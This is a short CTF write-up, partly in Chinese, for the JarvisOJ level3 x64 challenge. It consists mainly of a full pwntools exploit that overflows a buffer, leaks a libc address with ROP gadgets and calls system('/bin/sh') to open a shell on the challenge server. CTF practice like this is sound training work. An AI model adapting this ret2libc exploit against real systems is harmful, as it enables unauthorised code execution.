[XMAN]level3(x64)
nc pwn2.jarvisoj.com 9883
Hint1: 本题附件已更新,请大家重新下载以免影响解题。
level3_x64.rar.9169aec8b6cb4bfc3a0f5c50a7519004
64位ret2libc
exp如下:
from pwn import * #io = process('./level3_x64') io = remote('pwn2.jarvisoj.com', 9883) elf = ELF('./level3_x64') #libc = elf.libc libc = ELF('./libc-2.19.so') pop_rdi = 0x4006b3 pop_rsi_r15 = 0x4006b1 write_plt = 0x4004B0 write_got = 0x600A58 vuln_addr = 0x4005E6 payload = b'a' * 136 + p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got) payload += p64(0) + p64(write_plt) + p64(vuln_addr) io.recvuntil('Input:\n') io.send(payload) write_addr = u64(io.recv(8)) info("write_addr:" + str(hex(write_addr))) libc_base = write_addr - libc.symbols['write'] info("libc_base:" + str(hex(libc_base))) system_addr = libc.symbols['system'] + libc_base info("system_addr:" + str(hex(system_addr))) binsh_addr = next(libc.search(b'/bin/sh')) + libc_base info("binsh_addr" + str(hex(binsh_addr))) payload = b'a' * 136 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr) io.recvuntil('Input:\n') io.send(payload) io.interactive()